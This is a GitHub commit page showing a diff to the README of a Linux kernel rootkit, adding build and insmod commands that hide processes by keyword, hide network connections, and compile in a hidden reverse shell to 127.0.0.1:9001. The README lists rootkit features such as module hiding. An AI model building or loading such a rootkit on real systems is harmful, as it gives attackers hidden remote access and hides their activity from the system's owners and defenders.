Skip to content

Commit b6c5a25

Browse files
authored
Update README.md
1 parent 5af01cf commit b6c5a25

File tree

1 file changed

+8
-2
lines changed

1 file changed

+8
-2
lines changed

README.md

Lines changed: 8 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -25,11 +25,17 @@ Unlike traditional rootkits that rely on direct syscall table hooking or exporte
2525
- **Module Hiding** – Hides itself from kernel module listings
2626

2727
### Demo - Hiding names and processes
28-
28+
```c
29+
make STRINGS_EXCLUDES="SOME_KEYWORD,hidden"
30+
sudo insmod mod_rootkit.ko
31+
```
2932
<img width="437" alt="image" src="https://github.com/user-attachments/assets/855ae402-1cbd-4f5c-97d4-c83573f18a75" />
3033

3134
### Demo - Hiding network connections and a hidden reverse shell
32-
35+
```c
36+
make RSHELL_HOST=127.0.0.1 RSHELL_PORT=9001 NET_EXCLUDES=9001
37+
sudo insmod mod_rootkit.ko
38+
```
3339
<img width="437" alt="image" src="https://github.com/user-attachments/assets/c6fdb061-8fb6-4456-91a0-61037c303752" />
3440

3541
## Requirements

0 commit comments

Comments
 (0)